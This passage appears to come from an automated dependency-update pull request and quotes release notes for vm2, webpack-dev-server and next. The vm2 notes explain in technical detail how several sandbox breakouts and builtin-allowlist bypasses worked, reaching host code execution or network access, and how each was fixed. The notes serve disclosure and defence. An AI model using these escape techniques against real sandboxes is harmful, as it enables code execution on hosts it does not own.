\u003ccode\u003etest/ghsa/GHSA-rp36-8xq3-r6c4/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-r9pm-gxmw-wv6p\u003c/strong\u003e — NodeVM \u003ccode\u003ebuiltin: ['*']\u003c/code\u003e wildcard exposed Node's undocumented underscored network builtins (\u003ccode\u003e_http_client\u003c/code\u003e, \u003ccode\u003e_http_server\u003c/code\u003e, the \u003ccode\u003e_http_*\u003c/code\u003e / \u003ccode\u003e_tls_*\u003c/code\u003e / \u003ccode\u003e_stream_*\u003c/code\u003e siblings), letting sandbox code make outbound HTTP requests and open listening sockets even when the documented \u003ccode\u003e-http\u003c/code\u003e/\u003ccode\u003e-https\u003c/code\u003e/\u003ccode\u003e-net\u003c/code\u003e/\u003ccode\u003e-tls\u003c/code\u003e exclusions were used — SSRF-class capability bypass (CVSS 8.6). Structural fix in \u003ccode\u003elib/builtin.js\u003c/code\u003e: \u003ccode\u003eBUILTIN_MODULES\u003c/code\u003e filter now excludes any name starting with \u003ccode\u003e_\u003c/code\u003e, so \u003ccode\u003e'*'\u003c/code\u003e expands only to documented public builtins; explicit opt-in, \u003ccode\u003emock\u003c/code\u003e, and \u003ccode\u003eoverride\u003c/code\u003e paths remain functional. See ATTACKS.md Category 34 and \u003ccode\u003etest/ghsa/GHSA-r9pm-gxmw-wv6p/\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9g8x-92q2-p28f\u003c/strong\u003e — NodeVM builtin allowlist surfaced four process-wide observability builtins (\u003ccode\u003ediagnostics_channel\u003c/code\u003e, \u003ccode\u003easync_hooks\u003c/code\u003e, \u003ccode\u003eperf_hooks\u003c/code\u003e, \u003ccode\u003ev8\u003c/code\u003e) that read state from the entire host process rather than the sandbox: HTTP \u003ccode\u003eIncomingMessage\u003c/code\u003e headers (incl. auth tokens) via \u003ccode\u003ediagnostics_channel.subscribe\u003c/code\u003e, embedder \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e context via \u003ccode\u003easync_hooks.executionAsyncResource\u003c/code\u003e, embedder \u003ccode\u003eperformance.mark\u003c/code\u003e labels via \u003ccode\u003eperf_hooks\u003c/code\u003e, and the full V8 heap via \u003ccode\u003ev8.getHeapSnapshot\u003c/code\u003e / \u003ccode\u003ev8.queryObjects\u003c/code\u003e. Fix in \u003ccode\u003elib/builtin.js\u003c/code\u003e: extends \u003ccode\u003eDANGEROUS_BUILTINS\u003c/code\u003e with the four names, reusing the existing two-layer enforcement (\u003ccode\u003eBUILTIN_MODULES\u003c/code\u003e filter + \u003ccode\u003eaddDefaultBuiltin\u003c/code\u003e rejection, family-prefix and \u003ccode\u003enode:\u003c/code\u003e-normalised via \u003ccode\u003eisDangerousBuiltin\u003c/code\u003e). \u003ccode\u003emock\u003c/code\u003e/\u003ccode\u003eoverride\u003c/code\u003e escape hatches preserved. See ATTACKS.md Category 35 and \u003ccode\u003etest/ghsa/GHSA-9g8x-92q2-p28f/\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eUpgrade notes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eIf you constructed \u003ccode\u003eNodeVM({ nesting: \u0026lt;truthy\u0026gt; })\u003c/code\u003e without an explicit \u003ccode\u003erequire\u003c/code\u003e config object\u003c/strong\u003e, \u003ccode\u003enew NodeVM(...)\u003c/code\u003e now throws (GHSA-m4wx-m65x-ghrr). This covers every shape that previously silently produced a \u003ccode\u003evm2\u003c/code\u003e-only resolver: omitting \u003ccode\u003erequire\u003c/code\u003e entirely, or setting it to any falsy value (\u003ccode\u003efalse\u003c/code\u003e/\u003ccode\u003eundefined\u003c/code\u003e/\u003ccode\u003enull\u003c/code\u003e/\u003ccode\u003e0\u003c/code\u003e/\u003ccode\u003e''\u003c/code\u003e) or any truthy non-object value (\u003ccode\u003etrue\u003c/code\u003e/number/string/symbol/function); and also any truthy \u003ccode\u003enesting\u003c/code\u003e value, not only \u003ccode\u003enesting: true\u003c/code\u003e (\u003ccode\u003e1\u003c/code\u003e/\u003ccode\u003e'yes'\u003c/code\u003e/\u003ccode\u003e{}\u003c/code\u003e/\u003ccode\u003e[]\u003c/code\u003e/function). Either drop \u003ccode\u003enesting\u003c/code\u003e, or pass an explicit \u003ccode\u003erequire\u003c/code\u003e config object (e.g. \u003ccode\u003erequire: { builtin: [] }\u003c/code\u003e) to acknowledge that vm2 will be requireable from inside the sandbox. The error message is actionable and links to the README hardening section.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.3]\u003c/h2\u003e\n\u003cp\u003ePatch release — no API changes.\u003c/p\u003e\n\u003ch3\u003eSecurity fix\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-248r-7h7q-cr24\u003c/strong\u003e — async generator \u003ccode\u003eyield*\u003c/code\u003e-return thenable exception capture. Calling \u003ccode\u003ei.return(thenable)\u003c/code\u003e on an async generator delegating to a no-\u003ccode\u003ereturn\u003c/code\u003e inner iterator let V8's \u003ccode\u003ePromiseResolveThenableJob\u003c/code\u003e capture synchronous throws from the thenable's \u003ccode\u003e.then\u003c/code\u003e and surface them to sandbox code as iterator results — bypassing both the transformer's \u003ccode\u003ecatch\u003c/code\u003e instrumentation and the \u003ccode\u003eglobalPromise.prototype.then\u003c/code\u003e rejection sanitiser. Two-layer defense on \u003ccode\u003e%AsyncGeneratorPrototype%.next/.return/.throw\u003c/code\u003e in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e: every iterator-result promise routes value and rejection through \u003ccode\u003ehandleException\u003c/code\u003e, and every thenable argument is replaced with a sandbox-realm wrapper whose \u003ccode\u003e.then\u003c/code\u003e is a fixed \u003ccode\u003esafeThen\u003c/code\u003e that sanitises sync throws and recursively re-wraps any nested thenable handed to \u003ccode\u003eresolve(...)\u003c/code\u003e. When \u003ccode\u003esafeThen\u003c/code\u003e reads \u003ccode\u003evalue.then\u003c/code\u003e and it is non-function, the wrapper always resolves with a \u003ccode\u003e{__proto__: null}\u003c/code\u003e shadow so V8's re-read of \u003ccode\u003e.then\u003c/code\u003e cannot observe attacker-controlled values — closing every counting/self-replacing-getter TOCTOU variant. Trade-off: identity is not preserved for non-thenable values passed to \u003ccode\u003ei.return(x)\u003c/code\u003e. ATTACKS.md Category 29.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.2]\u003c/h2\u003e\n\u003cp\u003eThree advisories closed. Patch release — no API changes.\u003c/p\u003e\n\u003ch3\u003eSecurity fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-2cm2-m3w5-gp2f\u003c/strong\u003e — Internal state reachable via computed property access on \u003ccode\u003eglobalThis\u003c/code\u003e. The previous fix (GHSA-wp5r-2gw5-m7q7) tightened the transformer's identifier-rejection but left \u003ccode\u003eglobalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']\u003c/code\u003e and every reflective probe of the global object (bracket access, \u003ccode\u003eReflect.get\u003c/code\u003e, \u003ccode\u003eObject.getOwnPropertyDescriptor\u003c/code\u003e, \u003ccode\u003eObject.getOwnPropertyNames\u003c/code\u003e enumeration) returning the live state object — the transformer is a syntactic gate and cannot see through dynamic property keys. Structural fix: the bootstrap script (\u003ccode\u003evm.js\u003c/code\u003e's setupSandboxScript source) now declares \u003ccode\u003elet VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL\u003c/code\u003e at the script's top level, which lands the binding in the context's \u003ccode\u003e[[GlobalLexicalEnvironment]]\u003c/code\u003e — reachable as a bare identifier from every script (so transformer-emitted catch handlers still resolve), but absent from \u003ccode\u003eglobalThis\u003c/code\u003e's own-property table (so every computed-key probe returns \u003ccode\u003eundefined\u003c/code\u003e). The \u003ccode\u003edefineProperty\u003c/code\u003e install in \u003ccode\u003esetup-sandbox.js\u003c/code\u003e is removed entirely; the bootstrap IIFE assigns into the outer \u003ccode\u003elet\u003c/code\u003e instead. Supersedes GHSA-wp5r-2gw5-m7q7's identifier-only mitigation by closing the entire computed-key class. ATTACKS.md Category 27.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9vg3-4rfj-wgcm\u003c/strong\u003e — Sandbox breakout via null-proto throw / \u003ccode\u003ehandleException\u003c/code\u003e. The post-GHSA-mpf8 hardening switched \u003ccode\u003ehandleException\u003c/code\u003e and \u003ccode\u003eglobalPromise.prototype.then\u003c/code\u003e onFulfilled to wrap caught/resolved values with \u003ccode\u003ebridge.from()\u003c/code\u003e for \u0026quot;symmetry\u0026quot;. \u003ccode\u003efrom()\u003c/code\u003e builds a sandbox-side proxy whose target the bridge treats as host-realm; calling it on a sandbox-realm null-proto value (\u003ccode\u003e{__proto__: null}\u003c/code\u003e thrown or \u003ccode\u003ePromise.resolve\u003c/code\u003e-d by sandbox JS) produced a proxy whose \u003ccode\u003eset\u003c/code\u003e trap unwrapped sandbox proxies of host references (e.g. \u003ccode\u003eBuffer.prototype.inspect\u003c/code\u003e) back to their raw host originals and stored them on the underlying sandbox object — readable via the original sandbox reference and pivot to host \u003ccode\u003eFunction\u003c/code\u003e constructor → RCE. Three callsites in \u003ccode\u003elib/setup-sandbox.js\u003c/code\u003e reverted to \u003ccode\u003eensureThis()\u003c/code\u003e semantics; the host-Promise rejection sanitizer composes \u003ccode\u003efrom()\u003c/code\u003e outside \u003ccode\u003ehandleException\u003c/code\u003e so the GHSA-mpf8 invariant (host null-proto rejection values must reach sandbox callbacks bridge-wrapped) is preserved. ATTACKS.md Category 26.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eGHSA-9qj6-qjgg-37qq\u003c/strong\u003e — sandbox breakout via the species-defense helper \u003ccode\u003eneutralizeArraySpeciesBatch\u003c/code\u003e. The helper appended saved-state records to a fresh \u003ccode\u003e[]\u003c/code\u003e literal that — being allocated by the sandbox-side bridge closure — inherited sandbox \u003ccode\u003eArray.prototype\u003c/code\u003e. A sandbox-installed setter on \u003ccode\u003eArray.prototype[N]\u003c/code\u003e therefore captured the next \u003ccode\u003esaved[saved.length] = c\u003c/code\u003e write and exposed \u003ccode\u003ec.arr\u003c/code\u003e (a host-realm proxy) directly to attacker code, leading to host \u003ccode\u003eFunction\u003c/code\u003e extraction and RCE. Fixed in \u003ccode\u003elib/bridge.js\u003c/code\u003e by writing every saved-state entry through \u003ccode\u003ethisReflectDefineProperty\u003c/code\u003e so the appended slot is an own data property and no \u003ccode\u003eArray.prototype[N]\u003c/code\u003e setter is ever invoked while the bridge holds raw saved state. ATTACKS.md gains a new Defense Invariant (\u0026quot;Bridge-internal containers must not invoke sandbox code\u0026quot;) codifying the cross-cutting principle.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[3.11.1]\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/7a1f5100b96f48d34e0fe104ab37c0acc5944f92\"\u003e\u003ccode\u003e7a1f510\u003c/code\u003e\u003c/a\u003e Fix .node typo (\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/568\"\u003e#568\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/fac7fb43ad1d9765ed42734410f069b6ee17e34e\"\u003e\u003ccode\u003efac7fb4\u003c/code\u003e\u003c/a\u003e fix: test compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/2da83ed2f4b4e174ed086e8a53d1c5da11609d91\"\u003e\u003ccode\u003e2da83ed\u003c/code\u003e\u003c/a\u003e fix(\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/567\"\u003e#567\u003c/a\u003e): restore array iteration on vm.freeze()'d host arrays\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/51cc4bc2e6e12439b306f0266b6171e3805a2f38\"\u003e\u003ccode\u003e51cc4bc\u003c/code\u003e\u003c/a\u003e fix(\u003ca href=\"https://redirect.github.com/patriksimek/vm2/issues/566\"\u003e#566\u003c/a\u003e): restore util.inspect output on Node 26+\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/27354d56563b0acb54eb9dd92edbc167612b9d4b\"\u003e\u003ccode\u003e27354d5\u003c/code\u003e\u003c/a\u003e fix: test compatibility\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/59ccba9a508e96acb486e2c04666b998f95e17e1\"\u003e\u003ccode\u003e59ccba9\u003c/code\u003e\u003c/a\u003e feat: add merge-fix skill for integrating confirmed vulnerability fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/86ab819f202c3a8dad88cef5705f2e416c5188d7\"\u003e\u003ccode\u003e86ab819\u003c/code\u003e\u003c/a\u003e fix(GHSA-m4wx-m65x-ghrr): widen NESTING_OVERRIDE guard to all input shapes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/e1c48fce05189f48e71efbd32af0754efa4066bb\"\u003e\u003ccode\u003ee1c48fc\u003c/code\u003e\u003c/a\u003e fix(GHSA-9g8x-92q2-p28f): deny process-wide observability builtins in NodeVM\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/436053e30eecbabd487e2fd2959c137ac34e2bb1\"\u003e\u003ccode\u003e436053e\u003c/code\u003e\u003c/a\u003e fix(GHSA-r9pm-gxmw-wv6p): exclude underscored builtins from NodeVM '*' wildca...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/patriksimek/vm2/commit/a1ed47a98d1cc36cb48c0d566d55889688e0b59b\"\u003e\u003ccode\u003ea1ed47a\u003c/code\u003e\u003c/a\u003e fix(GHSA-rp36-8xq3-r6c4): close NodeVM builtin denylist bypass via process/in...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/patriksimek/vm2/compare/3.9.19...v3.11.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for vm2 since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `webpack-dev-server` from 4.15.1 to 4.15.2\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.15.2\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v4.15.2\"\u003e4.15.2\u003c/a\u003e (2024-03-20)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e bump webpack-dev-middleware (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/411620997594d24cd1f788e8533a5c6fa2736143\"\u003e4116209\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/v4.15.2/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v4.15.2\"\u003e4.15.2\u003c/a\u003e (2024-03-20)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003esecurity:\u003c/strong\u003e bump webpack-dev-middleware (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/411620997594d24cd1f788e8533a5c6fa2736143\"\u003e4116209\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/11bfcde1cbb291c349a61332937618685a98dd74\"\u003e\u003ccode\u003e11bfcde\u003c/code\u003e\u003c/a\u003e chore(release): 4.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/411620997594d24cd1f788e8533a5c6fa2736143\"\u003e\u003ccode\u003e4116209\u003c/code\u003e\u003c/a\u003e fix(security): bump webpack-dev-middleware\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v4.15.1...v4.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `next` from 14.2.28 to 15.5.18\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/vercel/next.js/releases\"\u003enext's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev15.5.18\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6\"\u003eGHSA-26hh-7cqf-hhc6: Middleware / Proxy bypass in App Router applications via segment-prefetch routes - Incomplete Fix Follow-Up\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.16\u003c/h2\u003e\n\u003cp\u003eThis release contains security fixes for the following advisories:\u003c/p\u003e\n\u003cp\u003eHigh:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-8h8q-6873-q5fj\"\u003eGHSA-8h8q-6873-q5fj: Denial of Service with Server Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f\"\u003eGHSA-267c-6grr-h53f: Middleware / Proxy bypass in App Router applications via segment-prefetch routes\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx\"\u003eGHSA-mg66-mrh9-m8jx: Denial of Service via connection exhaustion in applications using Cache Components\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-492v-c6pp-mqqv\"\u003eGHSA-492v-c6pp-mqqv: Middleware / Proxy bypass through dynamic route parameter injection\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r\"\u003eGHSA-c4j6-fc7j-m34r: Server-side request forgery in applications using WebSocket upgrades\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-36qx-fr4f-26g5\"\u003eGHSA-36qx-fr4f-26g5: Middleware / Proxy bypass in Pages Router applications using i18n\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eModerate:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-ffhc-5mcf-pf4q\"\u003eGHSA-ffhc-5mcf-pf4q: Cross-site scripting in App Router applications using CSP nonces\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-gx5p-jg67-6x7h\"\u003eGHSA-gx5p-jg67-6x7h: Cross-site scripting in beforeInteractive scripts with untrusted input\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh\"\u003eGHSA-h64f-5h5j-jqjh: Denial of Service in the Image Optimization API\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-wfc6-r584-vfw7\"\u003eGHSA-wfc6-r584-vfw7: Cache poisoning in React Server Component responses\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eLow:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-vfv6-92ff-j949\"\u003eGHSA-vfv6-92ff-j949: Cache poisoning via collisions in React Server Component cache-busting\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/security/advisories/GHSA-3g8h-86w9-wvmq\"\u003eGHSA-3g8h-86w9-wvmq: Middleware / Proxy redirects can be cache-poisoned\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev15.5.15\u003c/h2\u003e\n\u003cp\u003ePlease refer the following changelogs for more information about this security release:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"https://vercel.com/changelog/summary-of-cve-2026-23869\"\u003ehttps://vercel.com/changelog/summary-of-cve-2026-23869\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev15.5.14\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/9ff92cebcaa6ba4e7463b6fd037a8510ba9b81ec\"\u003e\u003ccode\u003e9ff92ce\u003c/code\u003e\u003c/a\u003e v15.5.18\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/00ebe23562bd7eb32dd78730984bfadb47138bcf\"\u003e\u003ccode\u003e00ebe23\u003c/code\u003e\u003c/a\u003e [backport] Disable build caches for production/staging/force-preview deploys ...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/62c97ab0b5825e2cbc15f6b682d8286a8dd6a038\"\u003e\u003ccode\u003e62c97ab\u003c/code\u003e\u003c/a\u003e v15.5.17\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/423623ae38c106273085b66946ee5bf9aab77f2c\"\u003e\u003ccode\u003e423623a\u003c/code\u003e\u003c/a\u003e Turbopack: Match proxy matchers with webpack implementation (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93594\"\u003e#93594\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/fa787399b38d9aa702118f9bd23a8315b9f0ecc6\"\u003e\u003ccode\u003efa78739\u003c/code\u003e\u003c/a\u003e Turbopack: Fix middleware matcher suffix (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93590\"\u003e#93590\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36e62c6eb7813e42d409eb487f93b829f4ad77e8\"\u003e\u003ccode\u003e36e62c6\u003c/code\u003e\u003c/a\u003e [backport] Turbopack: more strict vergen setup (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93588\"\u003e#93588\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/36589b5db512b7704cdadd873cbe49b6dbcc9261\"\u003e\u003ccode\u003e36589b5\u003c/code\u003e\u003c/a\u003e [backport][test] Pin package manager to patch versions (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/93596\"\u003e#93596\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/ad6fd4e50e5aba20b60d283c42b89273a3167ccd\"\u003e\u003ccode\u003ead6fd4e\u003c/code\u003e\u003c/a\u003e v15.5.16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/79d7dff1448483f0c8f187f98887b31019f6e494\"\u003e\u003ccode\u003e79d7dff\u003c/code\u003e\u003c/a\u003e Ignore malformed CSP nonce headers (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/103\"\u003e#103\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/vercel/next.js/commit/c4f69086cc8dcbd81b1dbc321c98ea874d90d6f8\"\u003e\u003ccode\u003ec4f6908\u003c/code\u003e\u003c/a\u003e router-server: guard upgrade proxy against absolute-url SSRF (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/77\"\u003e#77\u003c/a\u003e) (\u003ca href=\"https://redirect.github.com/vercel/next.js/issues/102\"\u003e#102\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/vercel/next.js/compare/v14.2.28...v15.5.18\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~GitHub%20Actions\"\u003eGitHub Actions\u003c/a\u003e, a new releaser for next since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 10.0.0 to 